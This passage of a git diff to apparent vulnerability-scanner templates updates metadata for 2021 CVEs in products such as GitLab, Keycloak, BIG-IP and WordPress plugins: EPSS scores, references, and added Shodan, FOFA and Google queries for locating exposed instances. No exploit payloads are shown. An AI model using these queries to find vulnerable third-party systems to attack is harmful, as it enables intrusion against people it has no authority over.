cve2021,cve,disclosure,router,intrusive,tenable,trendnet variables: password: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 68804ff1a6..b929baf24f 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20167 cwe-id: CWE-77 epss-score: 0.94822 - epss-percentile: 0.99222 + epss-percentile: 0.99273 cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 3f346d55d6..ab601590d4 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-20323 cwe-id: CWE-79 epss-score: 0.00173 - epss-percentile: 0.53461 + epss-percentile: 0.54333 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: vendor: redhat product: keycloak shodan-query: html:"Keycloak" + fofa-query: title="keycloak" + google-query: intitle:"keycloak" tags: cve2021,cve,keycloak,xss,redhat http: diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index be8fe34461..163616cab2 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20792 cwe-id: CWE-79 - epss-score: 0.00183 - epss-percentile: 0.54675 + epss-score: 0.00222 + epss-percentile: 0.60463 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 088094fef1..9311a11cee 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.96998 - epss-percentile: 0.99689 + epss-percentile: 0.99738 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 vendor: sixapart product: movable_type + shodan-query: http.title:"サインイン | movable type pro" + fofa-query: title="サインイン | movable type pro" + google-query: intitle:"サインイン | movable type pro" tags: cve2021,cve,packetstorm,rce,movable,sixapart http: diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index d8102a7f67..978526cbcb 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -21,14 +21,16 @@ info: cvss-score: 5.4 cve-id: CVE-2021-21087 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.54967 + epss-score: 0.00179 + epss-percentile: 0.54989 cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: max-request: 7 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2021,cve,xss,adobe,misc,coldfusion http: diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index ef5c8c40b0..046ea30d46 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -22,8 +22,8 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21234 cwe-id: CWE-22 - epss-score: 0.96798 - epss-percentile: 0.99621 + epss-score: 0.96732 + epss-percentile: 0.99659 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 5f5d12432e..0dcd5d7810 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -20,13 +20,16 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21287 cwe-id: CWE-918 - epss-score: 0.97112 - epss-percentile: 0.99745 + epss-score: 0.97268 + epss-percentile: 0.99855 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: minio product: minio + shodan-query: http.title:"minio browser" + fofa-query: title="minio console" + google-query: intitle:"minio browser" tags: cve,cve2021,minio,ssrf,oast http: diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index 94e7a4e3a6..e2e9ac43d4 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 - epss-score: 0.97312 - epss-percentile: 0.99864 + epss-score: 0.97313 + epss-percentile: 0.99874 cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index deec236dce..df6c703fbd 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 - epss-score: 0.01485 - epss-percentile: 0.85417 + epss-score: 0.02092 + epss-percentile: 0.89083 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 @@ -29,6 +29,7 @@ info: shodan-query: title:"Login - Adminer" fofa-query: app="Adminer" && body="4.7.8" hunter-query: app.name="Adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: cve2021,cve,adminer,ssrf http: diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 307176ac75..93f82c7acb 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 - epss-score: 0.73084 - epss-percentile: 0.98014 + epss-score: 0.64386 + epss-percentile: 0.97882 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 9f8d491b53..809ad1e94d 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21389 cwe-id: CWE-863 epss-score: 0.83143 - epss-percentile: 0.98347 + epss-percentile: 0.98426 cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index e90378933e..b29c1d6991 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 - epss-score: 0.15589 - epss-percentile: 0.95782 + epss-score: 0.2223 + epss-percentile: 0.96475 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: jellyfin shodan-query: http.html:"Jellyfin" fofa-query: title="Jellyfin" || body="http://jellyfin.media" + google-query: intitle:"jellyfin" tags: cve,cve2021,jellyfin,lfi http: diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index c54a547634..669340fd67 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-21745 cwe-id: CWE-352 epss-score: 0.26168 - epss-percentile: 0.96622 + epss-percentile: 0.96722 cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 1eda609ee0..90883398a6 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -13,13 +13,16 @@ info: reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Live-Hack-CVE/CVE-2021-21799 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-21799 cwe-id: CWE-79 - epss-score: 0.83144 - epss-percentile: 0.98156 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +30,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" + fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech http: diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 8f83efad55..85cb9026c6 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21800 cwe-id: CWE-79 - epss-score: 0.80604 - epss-percentile: 0.98232 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" + fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech http: diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index a04d3decde..2688c2f724 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"r-seenet" + fofa-query: body="r-seenet" tags: cve2021,cve,rseenet,xss,graph,advantech http: diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 7d7eaa7e95..24a6ed9c5f 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -19,13 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21802 cwe-id: CWE-79 - epss-score: 0.80604 - epss-percentile: 0.98232 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"r-seenet" + fofa-query: body="r-seenet" tags: cve2021,cve,rseenet,xss,advantech http: diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 8034853bc2..5a5e7ee01f 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -19,13 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21803 cwe-id: CWE-79 - epss-score: 0.80604 - epss-percentile: 0.98232 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"r-seenet" + fofa-query: body="r-seenet" tags: cve2021,cve,rseenet,xss,advantech http: diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index 3ed6b9fc39..fe9d9b89f1 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -30,6 +30,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" + fofa-query: body="r-seenet" tags: cve2021,cve,rce,r-seenet,advantech http: diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index dd10fe8e66..81b64d6de3 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -23,8 +23,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21978 cwe-id: CWE-20 - epss-score: 0.97469 - epss-percentile: 0.99959 + epss-score: 0.97475 + epss-percentile: 0.99967 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index c55d06d515..e13d41f8d8 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22005 cwe-id: CWE-22 - epss-score: 0.97389 - epss-percentile: 0.99909 + epss-score: 0.97396 + epss-percentile: 0.99916 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index cc98baa4c0..f3f34b8b6b 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-22053 cwe-id: CWE-94 - epss-score: 0.51942 - epss-percentile: 0.97288 + epss-score: 0.54052 + epss-percentile: 0.97624 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index e96b40f597..391970c475 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-22054 cwe-id: CWE-918 - epss-score: 0.74813 - epss-percentile: 0.98065 + epss-score: 0.7582 + epss-percentile: 0.98174 cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 35cf72e9b8..b76ed058ac 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -15,13 +15,14 @@ info: - https://twitter.com/ptswarm/status/1357316793753362433 - https://fortiguard.com/advisory/FG-IR-20-122 - https://nvd.nist.gov/vuln/detail/CVE-2021-22122 + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-22122 cwe-id: CWE-79 - epss-score: 0.00609 - epss-percentile: 0.76286 + epss-score: 0.0548 + epss-percentile: 0.93181 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index a5f6c0d641..c89c8a3799 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -20,13 +20,14 @@ info: cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 - epss-score: 0.96279 - epss-percentile: 0.99499 + epss-score: 0.96444 + epss-percentile: 0.99578 cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elastic product: elasticsearch + fofa-query: index_not_found_exception tags: cve2021,cve,elasticsearch,packetstorm,elastic http: diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 9909ce0fba..d81fa9d992 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -30,6 +30,8 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2021,cve,kev,hackerone,gitlab,rce http: diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 3cc37d0baf..84be035b41 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -25,13 +25,15 @@ info: cve-id: CVE-2021-22214 cwe-id: CWE-918 epss-score: 0.09317 - epss-percentile: 0.94551 + epss-percentile: 0.94683 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,ssrf http: diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 843d4a9253..991de64f34 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22707 cwe-id: CWE-798 - epss-score: 0.27092 - epss-percentile: 0.96671 + epss-score: 0.39995 + epss-percentile: 0.97263 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: product: evlink_city_evc1s22p4_firmware shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" + google-query: intitle:"evse web interface" tags: cve2021,cve,evlink,auth-bypass,schneider-electric http: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index b6c9e3bdca..592773fda4 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-22873 cwe-id: CWE-601 epss-score: 0.00922 - epss-percentile: 0.82556 + epss-percentile: 0.82899 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: revive-adserver product: revive_adserver shodan-query: http.favicon.hash:106844876 + fofa-query: icon_hash=106844876 + google-query: intitle:"revive adserver" tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver http: diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 8ae52aa88f..2946efdf9c 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -30,6 +30,8 @@ info: vendor: rocket.chat product: rocket.chat shodan-query: http.title:"Rocket.Chat" + fofa-query: title="rocket.chat" + google-query: intitle:"rocket.chat" tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli http: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 8cbe38d410..3156921190 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: f5 product: big-ip_access_policy_manager + shodan-query: http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2021,bigip,rce,kev,packetstorm,f5 http: diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index faae9c575d..686929fe9e 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -14,13 +14,14 @@ info: - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip - https://github.com/dnr6419/CVE-2021-24145 - https://nvd.nist.gov/vuln/detail/CVE-2021-24145 + - https://github.com/k0mi-tg/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 - epss-score: 0.94936 - epss-percentile: 0.99118 + epss-score: 0.96351 + epss-percentile: 0.99553 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +30,6 @@ info: product: modern_events_calendar_lite framework: wordpress tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus - variables: string: "CVE-2021-24145" diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index cffac4b43f..f94ba1a63c 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -29,6 +29,9 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress + publicwww-query: /wp-content/plugins/ninja-forms/ + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms http: diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index c9b9181338..b4634e5e00 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24169 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58287 + epss-percentile: 0.5893 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 4595b089bc..539210ccab 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24214 cwe-id: CWE-79 epss-score: 0.00337 - epss-percentile: 0.7074 + epss-percentile: 0.71271 cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: product: openid_connect_generic_client framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 663bb6f686..6823dc6620 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24215 cwe-id: CWE-425,CWE-284 - epss-score: 0.19113 - epss-percentile: 0.9615 + epss-score: 0.30288 + epss-percentile: 0.96943 cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: product: controlled_admin_access framework: wordpress publicwww-query: /wp-content/plugins/controlled-admin-access/ + shodan-query: http.html:/wp-content/plugins/controlled-admin-access/ + fofa-query: body=/wp-content/plugins/controlled-admin-access/ tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby http: diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 547d54e72c..097ff33b6d 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24227 cwe-id: CWE-200 epss-score: 0.02607 - epss-percentile: 0.9006 + epss-percentile: 0.90292 cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 6c47e5e801..7e97211902 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24235 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45944 + epss-percentile: 0.46103 cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 21a538f9ff..c0e7dbf23a 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24237 cwe-id: CWE-79 epss-score: 0.00265 - epss-percentile: 0.65501 + epss-percentile: 0.66138 cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index ffb9928f4c..ead9379a4d 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24239 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47461 + epss-percentile: 0.47703 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,6 @@ info: product: pie_register framework: wordpress tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index b1ce96f7aa..490c15abcd 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -28,6 +28,9 @@ info: vendor: supsystic product: popup framework: wordpress + publicwww-query: /wp-content/plugins/popup-by-supsystic + shodan-query: http.html:/wp-content/plugins/popup-by-supsystic + fofa-query: body=/wp-content/plugins/popup-by-supsystic tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic http: diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index e1212fa058..008efe6cda 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -21,13 +21,16 @@ info: cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: supsystic product: contact_form framework: wordpress + publicwww-query: /wp-content/plugins/contact-form-plugin/ + shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ + fofa-query: body=/wp-content/plugins/contact-form-plugin/ tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic http: diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 25ceab1fe5..24c2b6839f 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24278 cwe-id: CWE-863 - epss-score: 0.05506 - epss-percentile: 0.93039 + epss-score: 0.05157 + epss-percentile: 0.92966 cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index ae2c5774ce..316e6675b6 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -13,13 +13,15 @@ info: - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 - https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24285 cwe-id: CWE-89 - epss-score: 0.21023 - epss-percentile: 0.95973 + epss-score: 0.11694 + epss-percentile: 0.95278 cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index 88ac97423a..f42407ae19 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24286 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 